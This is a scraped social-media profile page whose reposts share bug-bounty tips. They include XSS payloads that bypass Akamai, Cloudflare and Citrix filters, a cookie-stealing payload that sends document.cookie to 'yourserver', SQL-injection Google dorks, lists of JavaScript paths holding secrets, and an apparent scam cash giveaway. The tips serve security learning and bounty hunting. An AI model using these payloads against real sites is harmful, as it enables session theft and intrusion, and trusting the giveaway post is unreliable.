@SdkOthmane Profile picture

Jeune

@SdkOthmane

Joined March 2021
Similar User
ckcsec photo

@ckcsec

Humbert photo

@LightideHK

ABILEX photo

@AbilexZug

Simpsons Motorhomes photo

@SimpsonsMCC

Bread Deputy photo

@BreadDeputy

Sierra Simmons photo

@itsaharristhing

norahul1020 photo

@norahul1020

look4electricians photo

@look4electricn

Jeune Reposted

A few months ago, @NikoueiMohammad and I teamed up to work on a famous public bug bounty program at @bugcrowd We ended up earning a sweet $20,300 bounty. Here's the write up, I hope you enjoy it. blog.voorivex.team/20300-bounties…


Jeune Reposted

Akamai #WAF #XSS Bypass* <A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)> By @KN0X55 @BruteLogic Add a Pro tool to your arsenal! knoxss.me/?page_id=1974 * requires a click, so it's not available to the tool.


Jeune Reposted

I’m gonna give 10 random people that repost this and follow me $25,000 for fun (the $250,000 my X video made) I’ll pick the winners in 72 hours


Jeune Reposted

Come and hack me… I dare you Labs.hackxpert.com


Jeune Reposted

If you want to practice a Web hacking lab without installing it on your local machine, here's the website lab.awh.zdresearch.com #bughunter #bugbountytips #cybersecuritytips

basant0x01's tweet image. If you want to practice a Web hacking lab without installing it on your local machine, here&apos;s the website lab.awh.zdresearch.com

#bughunter
#bugbountytips 
#cybersecuritytips

Jeune Reposted

24 Javascript path files used to store sensitive information in Web Application 1. /js/config.js 2. /js/credentials.js 3. /js/secrets.js 4. /js/keys.js 5. /js/password.js 6. /js/api_keys.js 7. /js/auth_tokens.js 8. /js/access_tokens.js 9. /js/sessions.js 10. /js/authorization.js


Jeune Reposted

#bugbounty I create a #nuclei template that "Analyse" js files for bug bounty hunters : - Extract Tokens. - Extract endpoints. - Extract URLs. - Extract Variables names. (All in one) Enjoy !! github.com/ayadim/Nuclei-…

ayadim_'s tweet image. #bugbounty 
I create a #nuclei template that &quot;Analyse&quot; js files for bug bounty hunters :
- Extract Tokens.
- Extract endpoints.
- Extract URLs.
- Extract Variables names.
(All in one)
Enjoy !!
github.com/ayadim/Nuclei-…

Jeune Reposted

CloudFlare #XSS Bypass <Img Src=OnXSS OnError=confirm(1)> => Why this new one is better? Because the <Img> element pops also in DOM scenarios where <Svg> can't. That very payload is currently available in @KN0X55 Pro and also in demo.

BRuteLogic's tweet image. CloudFlare #XSS Bypass

&amp;lt;Img Src=OnXSS OnError=confirm(1)&amp;gt;

=&amp;gt; Why this new one is better? 
Because the &amp;lt;Img&amp;gt; element pops also in DOM scenarios where &amp;lt;Svg&amp;gt; can&apos;t.

That very payload is currently available in @KN0X55 Pro and also in demo.

Jeune Reposted

🚨Google Dorks🚨 These are awesome dorks that may lead you to great findings when testing an application or doing bug bounty hunting. #cybersecurityjobs #bugbounty #bugbountytips #hackerone #bugcrowd #programming #google

wtf_brut's tweet image. 🚨Google Dorks🚨

These are awesome dorks that may lead you to great findings when testing an application or doing bug bounty hunting.

#cybersecurityjobs #bugbounty #bugbountytips #hackerone #bugcrowd #programming #google

Jeune Reposted

Here are 17 platforms where you can begin learning cybersecurity: 1. HackXpert - Free labs and training. 2. TryHackMe -Hands-on exercises and labs. 3. CyberSecLabs - High quality training labs. 4. Cybrary - Videos, labs, and practice exams. 5. LetsDefend - Blue team training…


Jeune Reposted

#KNOXSS GIVEAWAY 🔥FOLLOW US🔥 🔥LIKE & REPOST🔥 To have a chance to WIN one of the following • 1 Pro Subscription 1-month • 1 Pro Subscription 3-month • 1 Pro Subscription 6-month • 1 Pro Subscription 1-year Winners of this draw will be announced next week Good luck! 😀


Jeune Reposted

How many of these do you know? 100 web app exploits, in case you were bored :) Cross-Site Scripting (XSS) SQL Injection Cross-Site Request Forgery (CSRF) Remote File Inclusion (RFI) Local File Inclusion (LFI) Server-Side Request Forgery (SSRF) Clickjacking Directory Traversal…


Jeune Reposted

While testing for CVE-2023-24488 I found various servers behind Akamai and since the original payload gives a Forbidden response I found this bypass: post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E

bxmbn's tweet image. While testing for CVE-2023-24488 I found various servers behind Akamai and since the original payload gives a Forbidden response I found this bypass:

post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&amp;amp;%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E

Jeune Reposted

All praise is due to Allah alone❤ I earned $1,316 for my submission on @Hacker0x01 Bug: XSS to information Disclosure. I have used double URL encoded version of this payload: <img src="x" onerror="fetch('http://yourserver/?cookie=' + encodeURIComponent(document.cookie));">

Br0k3n_1337's tweet image. All praise is due to Allah alone❤

I earned $1,316 for my submission on
@Hacker0x01 

Bug: XSS to information Disclosure.

I have used double URL encoded version of this payload:
&amp;lt;img src=&quot;x&quot; onerror=&quot;fetch(&apos;http://yourserver/?cookie=&apos; + encodeURIComponent(document.cookie));&quot;&amp;gt;

Jeune Reposted

After several tries of Bypass Xss payload and it worked. Payloads: "*alert(1)*"

pikpikcu's tweet image. After several tries of Bypass Xss payload and it worked.

Payloads: &quot;*alert(1)*&quot;
pikpikcu's tweet image. After several tries of Bypass Xss payload and it worked.

Payloads: &quot;*alert(1)*&quot;

Jeune Reposted

#bugbountytips #bugbountytip add this XSS payload for your list url=%26%2302java%26%23115cript:alert(document.domain) Happy Hunting

GodfatherOrwa's tweet image. #bugbountytips #bugbountytip 

add this XSS payload for your list 

url=%26%2302java%26%23115cript:alert(document.domain)

Happy Hunting

Jeune Reposted

Woa, this #BugBountyTip from @hakluke works surprisingly well! Someone please automate this 🙏 #BugBountyTips

bug_bounty_tips's tweet image. Woa, this #BugBountyTip from @hakluke works surprisingly well! Someone please automate this 🙏 #BugBountyTips

Jeune Reposted

Use SQLI google dorks list to find hidden parameters 👇🔥 site:*.com inurl:&#8221;main.php?id= site:*.com inurl:zoom.php?id=site:.il site:*.com inurl:&#8221;details.php?id= site:*.com inurl:&#8221;?came= site:*.com inurl:&#8221;index.php?page=


Jeune Reposted

If you found an injection point but can't get an XSS because a WAF is blocking you Leverage loaded technologies to still execute XSS: BLOCKED: "><a href=javascript:alert(1)>accept</a> ALLOWED: xyz"/ng-click="constructor.constructor('alert(1)')() #bugbounty #bugbountytip

0xblackbird's tweet image. If you found an injection point but can&apos;t get an XSS because a WAF is blocking you

Leverage loaded technologies to still execute XSS:

BLOCKED: &quot;&amp;gt;&amp;lt;a href=javascript:alert(1)&amp;gt;accept&amp;lt;/a&amp;gt;

ALLOWED: xyz&quot;/ng-click=&quot;constructor.constructor(&apos;alert(1)&apos;)()

#bugbounty #bugbountytip

Jeune Reposted

Reflected XSS 1- Simple Google Dork *.target[.]com ext:php 2- get some interesting Subdomain 3- I use waybackurls to collect endpoint like echo "sub[.]target[.]com" | waybackurls | httpx | sort -u > endpoint.txt 4- cat endpoint.txt | grep "=" | kxss #bugbountytips #BugBounty

0xNaeem's tweet image. Reflected XSS

1- Simple Google Dork *.target[.]com ext:php
2- get some interesting Subdomain
3- I use waybackurls to collect endpoint like echo &quot;sub[.]target[.]com&quot; | waybackurls | httpx | sort -u &amp;gt; endpoint.txt 
4- cat endpoint.txt | grep &quot;=&quot; | kxss

#bugbountytips #BugBounty
0xNaeem's tweet image. Reflected XSS

1- Simple Google Dork *.target[.]com ext:php
2- get some interesting Subdomain
3- I use waybackurls to collect endpoint like echo &quot;sub[.]target[.]com&quot; | waybackurls | httpx | sort -u &amp;gt; endpoint.txt 
4- cat endpoint.txt | grep &quot;=&quot; | kxss

#bugbountytips #BugBounty

Loading...

Something went wrong.


Something went wrong.